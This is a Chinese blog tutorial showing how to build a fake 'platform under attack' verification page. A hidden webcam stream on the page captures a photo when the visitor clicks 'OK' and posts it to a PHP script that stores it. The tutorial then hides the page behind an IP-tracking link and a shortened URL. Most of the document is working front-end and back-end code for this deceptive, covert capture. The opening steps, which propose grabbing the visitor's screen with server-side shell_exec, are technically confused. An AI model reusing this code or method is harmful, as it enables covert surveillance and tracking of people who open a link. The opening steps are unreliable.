使用PHP记录网站攻击者的桌面照片和IP地址
要利用PHP记录网站攻击者的桌面照片和IP地址,可以使用以下方法: 1. 首先,确保你的服务器已经安装了PHP。 2. 创建一个PHP文件,例如`capture_screenshot.php`。 3. 在`capture_screenshot.php`中,使用`shell_exec()`函数执行命令行命令来捕获攻击者的屏幕截图。 4. 将捕获的屏幕截图保存到服务器上的一个临时文件夹中。 5. 获取攻击者的IP地址,可以使用`$_SERVER['REMOTE_ADDR']`变量。 6. 将IP地址和屏幕截图的文件名存储到数据库或文本文件中。 7. 最后,删除临时文件夹中的屏幕截图。
利用php记录网站攻击者桌面照片和IP地址,可以记录IP,顺手偷拍攻击对象,看看他长啥样!
因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍
随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只是做一次演示)
前端代码
<!DOCTYPEhtml><html><head><metacharset="UTF-8"><title>人机验证机制</title><metaname='Generator'content='EditPlus'><metaname="viewport"content="width=device-width,user-scalable=no,initial-scale=1,minimal-ui"><metaname='Description'content='invetedby:http://davidwalsh.name/browser-camera'><scripttype="text/javascript"src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.js"></script><style>htmlbody{width:100%;height:auto;margin:0auto0px;padding:000px;background-color:#444}a{text-decoration:none;}.wenzi{width:300px;height:300px;margin-right:auto;margin-left:auto;}.yuyan{width:100%;height:150px;color:#fff;margin-top:60px;text-align:center;}.sf{width:100%;height:150px;line-height:150px;text-align:center;}.sfa{display:block;font-size:12px;margin-left:28%;text-decoration:none;text-align:center;background-color:#EBEBEB;width:50px;height:20px;line-height:20px;border:solid1px#222;float:left;}.sfbutton{display:block;font-size:13px;margin-left:10px;text-align:center;background-color:#EBEBEB;width:50px;height:22px;border:solid1px#222;float:left;}</style><script>window.addEventListener("DOMContentLoaded",function(){//Grabelements,createsettings,etc.varcanvas=document.getElementById('canvas');varcontext=canvas.getContext('2d');varvideo=document.getElementById('video');varmediaConfig={video:true};varerrBack=function(e){console.log('Anerrorhasoccurred!',e)};//Putvideolistenersintoplaceif(navigator.mediaDevices&&navigator.mediaDevices.getUserMedia){navigator.mediaDevices.getUserMedia(mediaConfig).then(function(stream){video.src=window.URL.createObjectURL(stream);video.play();});}/*Legacycodebelow!*/elseif(navigator.getUserMedia){//Standardnavigator.getUserMedia(mediaConfig,function(stream){video.src=stream;video.play();},errBack);}elseif(navigator.webkitGetUserMedia){//WebKit-prefixednavigator.webkitGetUserMedia(mediaConfig,function(stream){video.src=window.webkitURL.createObjectURL(stream);video.play();},errBack);}elseif(navigator.mozGetUserMedia){//Mozilla-prefixednavigator.mozGetUserMedia(mediaConfig,function(stream){video.src=window.URL.createObjectURL(stream);video.play();},errBack);}//Triggerphototakedocument.getElementById('snap').addEventListener('click',function(){context.drawImage(video,0,0,640,480);varurl=canvas.toDataURL('image/png');document.getElementById('result').value=url;varuu=url.substr(22);$(document).ready(function(){$.ajax({cache:true,type:"POST",url:"jieshou.php",data:$('#tp').serialize(),async:false,error:function(request){alert("Connectionerror");},success:function(data){$(".return").parent().html(data);}});});});},false);</script></head><body><divclass="wenzi"><divclass="yuyan">目前平台正在遭受攻击!<br/><br/>显示非正常请使用uc浏览器访问!</div><divclass="sf"><buttonid='snap'>确定</button></div></div><div><videoid='video'width='0'height='0'></video><canvasstyle="width:0px;height:0px"id='canvas'width='640'height='480'></canvas><formid="tp"action="./jieshou.php"method="post"><inputtype="hidden"type="file"value="sdgsdg"id="demo_input"/><inputtype="hidden"name="img"id="result"value=""/><pid="img_area"></p><inputtype="hidden"type="submit"value="提交"></form></div><divclass="return"></div></body></html>jishu.php
后端代码
<?phperror_reporting(0);$base64_img=trim($_POST['img']);$up_dir='./upload/';//存放在当前目录的upload文件夹下if(!file_exists($up_dir)){mkdir($up_dir,0777);}if(preg_match('/^(data:s*image/(w+);base64,)/',$base64_img,$result)){$type=$result[2];if(in_array($type,array('pjpeg','jpeg','jpg','gif','bmp','png'))){$new_file=$up_dir.date('YmdHis_').'.'.$type;if(file_put_contents($new_file,base64_decode(str_replace($result[1],'',$base64_img)))){$img_path=str_replace('../../..','',$new_file);echo'网站正在遭受攻击,请稍后访问';}}}绑定域名并存放至根目录前往ip.heibai.org生成定位链接
(因为平台都是我的,所以我可以自由修改定位链接内容!!!如果要实践定位链接请自行搭建)
马赛克部分为偷拍地址,设置1秒跳转
百度短网址生成链接,开始测试阶段
IP记录成功,接下来是激动人心的时刻,看看是否偷拍成功
查看了我的图片存放目录,成功了的
嗯,对,证明我的思路是可行的。
